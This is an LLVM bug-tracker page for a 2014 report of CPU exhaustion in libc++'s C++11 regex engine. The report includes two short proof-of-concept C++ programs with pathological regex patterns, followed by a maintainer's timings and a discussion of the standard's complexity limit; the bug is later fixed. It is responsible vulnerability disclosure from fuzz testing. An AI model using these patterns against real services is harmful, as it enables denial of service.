New user self-registration is disabled due to spam. For an account please email bugs-admin@lists.llvm.org with your e-mail address and full name.

Bug 20291 - libcxx C++11 regex cpu resource exhaustion
Summary: libcxx C++11 regex cpu resource exhaustion
Status: RESOLVED FIXED
Alias: None
Product: libc++
Classification: Unclassified
Component: All Bugs (show other bugs)
Version: 3.4
Hardware: PC FreeBSD
: P normal
Assignee: Unassigned Clang Bugs
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2014-07-13 14:47 PDT by Maksymilian Arciemowicz
Modified: 2017-09-12 10:57 PDT (History)
3 users (show)

See Also:
Fixed By Commit(s):


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Maksymilian Arciemowicz 2014-07-13 14:47:56 PDT
clang 3.4 objective regex resource exhaustion

I've discovered cpu exhaustion in regex implementation of libcxx.

PoC1:
----------------------------------------------
#include <iostream>
#include <regex> 
#include <string>

using namespace std;

int main() {
    try {
        regex r("(.*(.*){999999999999999999999999999999999})", regex_constants::extended);
        smatch results;
        string test_str = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||";
        if (regex_search(test_str, results, r))
            cout << results.str() << endl;
        else
            cout << "no match";
    } catch (regex_error &e) {
        cout << "extended: what: " << e.what() << "; code: " << e.code() << endl;
    }
    
    return 0;
}
----------------------------------------------

PoC2:
----------------------------------------------
#include <iostream>
#include <regex> 
#include <string>

using namespace std;

int main() {
    try {
        regex r("((((((.*(.*)(.*)(.*).*).*).*).*).*.*)findme)");
        smatch results;
        string test_str = "|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||";
        if (regex_search(test_str, results, r))
            cout << results.str() << endl;
        else
            cout << "no match";
    } catch (regex_error &e) {
        cout << "extended: what: " << e.what() << "; code: " << e.code() << endl;
    }
    
    return 0;
}
----------------------------------------------

EXPECTED:
regex_constants::error_complexity

BR,
Maksymilian Arciemowicz
http://cxsecurity.com/
Comment 1 Marshall Clow (home) 2014-07-15 09:30:05 PDT
Thanks for the example.
I have reproduced this; varying the number of '9's in the regex:

5 nines -> 0m0.163s
6 nines -> 0m1.643s
7 nines -> 0m16.254s
8 nines -> 2m41.216s

Your example has 33 nines; it should take a nice long time to run :-)
3 * 10^25 minutes. Since there is about 5e^5 minutes in a year, that's on the order of 10^20 years.

Technically, this is not a bug, but a QoI issue.
The standard states that error_complexity should be thrown when "The complexity of an attempted match against a regular expression exceeded a pre-set level." If libc++ sets that "level" arbitrarily high, then it can take "forever" to process it w/o being non-conforming.

As an aside - I tried the "8 nines" test on libstdc++; 21 hours and still going. (vs 3 minutes for libc++)
Comment 2 Maksymilian Arciemowicz 2014-07-15 11:50:59 PDT
I didn't find more information about pre-set level. I agree with you that are many kind of interpretation pre-set level. In security aspect this level shouldn't be high but in other case like static code analysis should be high.
Don't try compare libc++ and libstdc++. This ticket is an result of my fuzz testing. In libc++ only cpu exhaustion in matching otherwise libstdc++ where multiple issues was defined. I also confirm that in my fuzz testing libc++ was faster than libstdc++.
Who can say something more about pre-set level?
Comment 3 Marshall Clow (home) 2014-07-15 12:05:17 PDT
(In reply to comment #2)
> I didn't find more information about pre-set level. I agree with you that
> are many kind of interpretation pre-set level. In security aspect this level
> shouldn't be high but in other case like static code analysis should be high.
> Don't try compare libc++ and libstdc++. This ticket is an result of my fuzz
> testing. In libc++ only cpu exhaustion in matching otherwise libstdc++ where
> multiple issues was defined. I also confirm that in my fuzz testing libc++
> was faster than libstdc++.
> Who can say something more about pre-set level?

Just to be clear; I appreciate the bug report, and I'm glad you're doing fuzz testing against libc++.

The comment in the standard about "pre-set level" is the only mention there. I interpreted it as being implementation-defined. Checking the ECMA-262 standard, I found no mention of complexity (search for 'complex'), but I'm still looking.
Comment 4 Marshall Clow (home) 2017-09-12 10:57:28 PDT
Fixed by commit 313056.